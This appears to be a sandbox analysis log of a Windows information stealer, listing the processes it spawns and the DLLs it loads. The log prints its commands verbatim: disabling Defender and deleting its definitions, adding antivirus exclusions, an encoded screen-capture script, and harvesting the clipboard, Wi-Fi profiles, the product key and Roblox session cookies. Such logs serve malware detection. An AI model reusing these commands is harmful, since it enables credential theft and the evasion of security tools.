Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\ahost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: winmm.dll	Jump to behavior
